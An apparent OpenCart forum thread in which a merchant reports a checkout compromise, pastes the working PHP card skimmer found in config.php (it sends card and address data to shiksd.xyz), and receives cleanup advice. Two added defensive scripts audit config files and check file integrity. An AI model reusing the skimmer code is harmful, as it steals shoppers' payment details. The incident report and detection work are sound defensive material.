Post by CTWeb » Fri Oct 13, 2023 12:59 am

Our malware software on the host recently alerted us that some malicious code had been added to 4 files on our client's website.

The hacker has added a fake payment section into the checkout Step 5, to defraud users of their card payment details.

Please see attached screenshot of the spoof payment fields they inserted.

The following files were modified to first allow file uploads:

\admin\language\en-gb\extension\keysubmit.php
\admin\language\en-gb\extension\headermenu.php
\admin\language\en-gb\extension\extension\feed.php
\admin\language\ru-ru\extension\module\sitemenu.php

Then the spoof HTML fields were added to both the default template and also our custom template:
\catalog\view\theme\default\template\checkout\payment_method.twig
\catalog\view\theme\[our_custom_theme]\template\checkout\payment_method.twig

Then the following code was added to:
\config.php

Code:

if (isset($_POST['postcode'])) {
    // Stage 1: when the checkout address form is submitted, stash the
    // customer's billing details in the PHP session under obfuscated keys.
    session_start();
    $_SESSION['adddreas']     = $_POST["address_1"];
    $_SESSION['addrebs']      = $_POST["city"];
    $_SESSION['sadsdws']      = $_POST["postcode"];
    $_SESSION['adsdSws']      = $_POST["firstname"];
    $_SESSION['adsdEWQWEws']  = $_POST["lastname"];
    $_SESSION['adsdEWQWEwse'] = $_POST["email"];
    $_SESSION['adsdEWQWEwst'] = $_POST["telephone"];
} elseif (isset($_POST['address_id'])) {
    // Stage 1b: if a saved address was selected instead, read the same
    // details straight from the oc_address table using the store's own
    // DB credentials (the posted address_id is interpolated unescaped).
    session_start();
    $link  = mysqli_connect(DB_HOSTNAME, DB_USERNAME, DB_PASSWORD, DB_DATABASE);
    $youth = $_POST['address_id'];
    $sql   = "SELECT * FROM oc_address WHERE address_id='$youth'";
    if ($res = mysqli_query($link, $sql)) {
        if (mysqli_num_rows($res) > 0) {
            while ($row = mysqli_fetch_array($res)) {
                $_SESSION['adddreas']    = $row["address_1"];
                $_SESSION['addrebs']     = $row["city"];
                $_SESSION['sadsdws']     = $row["postcode"];
                $_SESSION['adsdSws']     = $row["firstname"];
                $_SESSION['adsdEWQWEws'] = $row["lastname"];
            }
        }
    }
}

if (isset($_POST['ccc'])) {
    // Stage 2: when the fake payment form (fields ccc / expp / cvvv) is
    // submitted, join the card data to the stored address details and
    // POST the whole record to the attacker's server.
    session_start();
    $ccnum    = $_POST['ccc'];
    $expmonth = $_POST['expp'];
    $cvv      = $_POST['cvvv'];
    $street   = $_SESSION['adddreas'];
    $postcode = $_SESSION['sadsdws'];
    $city     = $_SESSION['addrebs'];
    $fnamezz  = $_SESSION['adsdEWQWEws'];
    $fnamez   = $_SESSION['adsdSws'];
    $email    = $_SESSION['adsdEWQWEwse'];
    $phone    = $_SESSION['adsdEWQWEwst'];
    $ip       = $_SERVER['SERVER_NAME'];   // tells the receiver which shop the record came from
    $message  = "$fnamez $fnamezz|$ccnum|$expmonth|$cvv|$street|$city|$postcode|$phone|$email";
    $rnessage = "$message\n";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://shiksd.xyz/plugins/");
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "data=$rnessage&name=$ip");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $server_output = curl_exec($ch);
    curl_close($ch);
}
As you can see, this posts the customer's data straight to a dodgy website URL: shiksd.xyz/plugins/
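One check a store owner can run on a restored site, added here as an example and not code from the original post: an OpenCart config.php consists only of define() lines and comments, so any other statement in it is out of place. The script below is my own; the indicator list is an assumption about what skimmer code tends to contain, and both sample files are constructed, with the exfiltration host replaced by a placeholder.

```python
import re
import sys
from pathlib import Path

# Constructed sample: a clean OpenCart 3.x config.php is nothing but define() calls.
CLEAN_CONFIG = """<?php
// HTTP
define('HTTP_SERVER', 'https://shop.example/');
// DB
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'shop');
define('DB_PASSWORD', 'redacted');
define('DB_DATABASE', 'shop');
define('DB_PREFIX', 'oc_');
"""

# Constructed sample: the same file with a skimmer appended, modelled on the
# snippet in the post above (EXFIL-HOST-PLACEHOLDER stands in for the real host).
INJECTED_CONFIG = CLEAN_CONFIG + """
if (isset($_POST['ccc'])) {
    session_start();
    $ccnum = $_POST['ccc'];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://EXFIL-HOST-PLACEHOLDER/plugins/");
    curl_setopt($ch, CURLOPT_POSTFIELDS, "data=$ccnum");
    curl_exec($ch);
}
"""

# Lines that legitimately occur in config.php: PHP tags, comments, blanks, define().
ALLOWED_LINE = re.compile(
    r"^\s*(?:<\?php|\?>|//.*|#.*|/\*.*|\*.*|define\(\s*'[A-Z0-9_]+'\s*,.*\);)?\s*$"
)

# Traits (my assumption) that turn a stray statement into a probable skimmer.
INDICATORS = {
    "reads POST data": re.compile(r"\$_POST\s*\["),
    "session use": re.compile(r"\bsession_start\s*\("),
    "outbound HTTP": re.compile(
        r"\bcurl_(?:init|setopt|exec)\s*\(|\bfsockopen\s*\(|\bfile_get_contents\s*\(\s*['\"]https?://"
    ),
    "direct DB query": re.compile(r"\bmysqli_(?:connect|query)\s*\("),
    "eval/obfuscation": re.compile(r"\beval\s*\(|\bbase64_decode\s*\(|\bgzinflate\s*\("),
}


def audit_config(text: str) -> dict:
    """Return every non-define line of a config.php and the skimmer traits they show."""
    stray = []
    hits = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if ALLOWED_LINE.match(line):
            continue
        stray.append((lineno, line.strip()))
        for label, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.add(label)
    return {"stray_lines": stray, "indicators": sorted(hits), "suspicious": bool(stray)}


def audit_config_file(path: str) -> dict:
    """Convenience wrapper for a real file on disk."""
    return audit_config(Path(path).read_text(errors="replace"))


if __name__ == "__main__":
    # Usage: python audit_config.py /path/to/config.php   (no argument runs the samples)
    if len(sys.argv) == 2:
        report = audit_config_file(sys.argv[1])
    else:
        report = audit_config(INJECTED_CONFIG)
    for lineno, line in report["stray_lines"]:
        print(f"line {lineno}: {line}")
    print("indicators:", ", ".join(report["indicators"]) or "none")
```

The same idea applies to admin/config.php, which has the same all-define() shape; a stray line there with none of the indicators is still worth reading, because it should not exist at all.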

We have now fixed the site by restoring the hacked files from our original backup, and also done a full compare of all site files to check no other files were affected. All passwords have now been changed, and database credentials updated.

Questions:
1. Has anyone else seen a sophisticated hack like this?
2. Is there any way to find out how they managed to inject the original code?
3. Are there any security plugins that prevent code from being edited?
4. Are there any known vulnerabilities with the mods / extensions we are using?

Opencart: 3.0.3.8

Extensions / Modules:
PayPal Checkout Integration (Highly Recommended)
Worldpay Business Gateway
CouponAtCheckout (by cartbinder)
Extra Product Pages
Mega Filter PRO
Low Stock Management
Manufacturer List
Price Based Shipping
Redirect Manager
Restrict Payment Methods
Smart Search
TMD Import Export Module
Automatically generate SEO URL slug

Attachments:

config-php.JPG - hacked config file
feed-php.JPG - code for uploading files
Checkout-Step-5.JPG - hacked Step 5 of checkout

Post by TMD Extension » Fri Oct 13, 2023 1:50 pm

We can assure you that our TMD import-export module is highly tested. There are some possible thoughts you can check with your hosting.

TO DO
Take the backup of the database from the admin.
Re-install OpenCart again and restore the previous backup.

1. If this is shared hosting, then the easiest way to inject into one website is for hackers to gain access to all websites.
2. Use antivirus or third-party software like SECURI.net to add an extra layer of security on it.
3. Use the hosting provider's inbuilt anti-virus software.
4. Try to restore the backup instead of cleaning the existing website. There is a possible case that virus code is present somewhere hidden in your files.
5. Use WHM or scan each folder like HOME, WWW, public_FTP, public_html, mail etc. to make sure you are virus-free.
6. Contact the developer, company, or hosting provider who can help you to restore the website.
7. Always have the most recent backup ready for these scenarios.


Thanks & Regards
Sehaj Kaur
TMD Extensions
Contact Us For Customisations


Post by ADD Creative » Fri Oct 13, 2023 4:45 pm

Weak and stolen passwords are possibly most likely. So make sure you have changed all of them, including FTP and hosting. Delete any accounts you are not using.

To find out how they managed to inject the original code would be a case of going through the various logs. FTP, web access, PHP and OpenCart error logs, etc. The date the files were changed may help to know when to start looking.

www.add-creative.co.uk


Post by OSWorX » Fri Oct 13, 2023 5:20 pm

One aspect (besides the already given tips) is: if you operate e.g. WordPress on the same account, this will be the most open door for script kiddies and so-called hackers.
To secure OpenCart it's advised to operate it in a single instance, with no other CMS etc.!

Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.


Post by johnp » Fri Oct 13, 2023 10:15 pm

Once you're back up and running with a clean site put a firewall on it:

Ninja Firewall
https://nintechnet.com/ninjafirewall/pro-edition

The free version of Ninja Firewall is fine to get going with.

Opencart 1.5.6.5/OC Bootstrap Pro/VQMOD lover, user and geek.
Affordable Service £££ - Opencart Installs, Fixing, Development and Upgrades
Plus Ecommerce, Marketing, Mailing List Management and More
FREE Guidance and Advice at https://www.ecommerce-help.co.uk


Post by halfhope » Sat Oct 14, 2023 2:03 am

Hi! 

1. Yes, I am. Only a few of them are capable of surprising. This is not.
2. Already not, you deleted all files and logs. Possibly he has access to the filesystem through FTP/admin.
3. I have a file change notification extension - FSMonitor.
4. No, it's hard to write bad code in OpenCart.

My extensions in marketplace. [ security | flexibility | speedup ]
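ADD Creative's point that file modification dates tell you when to start reading the logs, and halfhope's file-change-notification approach, both depend on knowing exactly which files changed. As an added example, not an extension from this thread and not FSMonitor's code, the script below takes a SHA-256 baseline of a site's PHP, Twig, TPL and .htaccess files and later compares the tree against it, listing added, removed and modified files. The site tree in demo() is constructed, and the watched-file list is my own choice.

```python
import hashlib
import json
import sys
import tempfile
from pathlib import Path

# File types an attacker must touch to plant server-side code or fake checkout
# fields (assumption: images and uploads are left out to keep the baseline small).
WATCHED_SUFFIXES = {".php", ".twig", ".tpl"}
WATCHED_NAMES = {".htaccess"}


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every watched file (path relative to root) to its hash and mtime."""
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and (path.suffix in WATCHED_SUFFIXES or path.name in WATCHED_NAMES):
            rel = path.relative_to(root).as_posix()
            baseline[rel] = {"sha256": hash_file(path), "mtime": path.stat().st_mtime}
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Report which files appeared, disappeared or changed content since the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p]["sha256"] != current[p]["sha256"])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Constructed site tree: baseline it, replay the kind of tampering in the thread, re-scan."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        files = {
            "config.php": "<?php\ndefine('DB_PREFIX', 'oc_');\n",
            "catalog/view/theme/default/template/checkout/payment_method.twig": "{{ payment_form }}\n",
            "admin/language/en-gb/extension/module/sitemenu.php": "<?php\n$_['heading_title'] = 'Menu';\n",
            "image/logo.png": "not a watched type\n",
        }
        for rel, body in files.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
        baseline = build_baseline(root)
        # Simulated tampering (constructed placeholders, not the real payload): code
        # appended to config.php, fake fields in the checkout template, a dropped script.
        (root / "config.php").write_text(files["config.php"] + "if (isset($_POST['ccc'])) { /* skimmer */ }\n")
        (root / "catalog/view/theme/default/template/checkout/payment_method.twig").write_text('<input name="ccc">\n')
        (root / "admin/language/en-gb/extension/keysubmit.php").write_text("<?php /* dropped uploader */\n")
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    # Usage: python fim.py baseline SITE_ROOT baseline.json
    #        python fim.py verify   SITE_ROOT baseline.json
    if len(sys.argv) == 4 and sys.argv[1] == "baseline":
        Path(sys.argv[3]).write_text(json.dumps(build_baseline(Path(sys.argv[2])), indent=2))
    elif len(sys.argv) == 4 and sys.argv[1] == "verify":
        old = json.loads(Path(sys.argv[3]).read_text())
        print(json.dumps(compare(old, build_baseline(Path(sys.argv[2]))), indent=2))
    else:
        print(json.dumps(demo(), indent=2))
```

Keep baseline.json outside the web root and off the account the web server writes as; a baseline the attacker can rewrite is no baseline. Re-run it right after every legitimate update or extension install, and the mtime stored for each modified file gives the timestamp to start searching the FTP and access logs from.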


Post by merchantta » Mon Oct 16, 2023 7:46 pm

Thank you for sharing your experience with the community. While it's challenging to pinpoint the exact vulnerability, it's crucial to follow the recommended security measures to prevent future attacks. Stay vigilant and keep your software and extensions up to date.

Merchantta is here to help you. We offer ready-to-use Payment Gateways with verified documents along with Ad Account Renting, Account Suspension Removal Services, & Tax Exemption Services at the best market price.
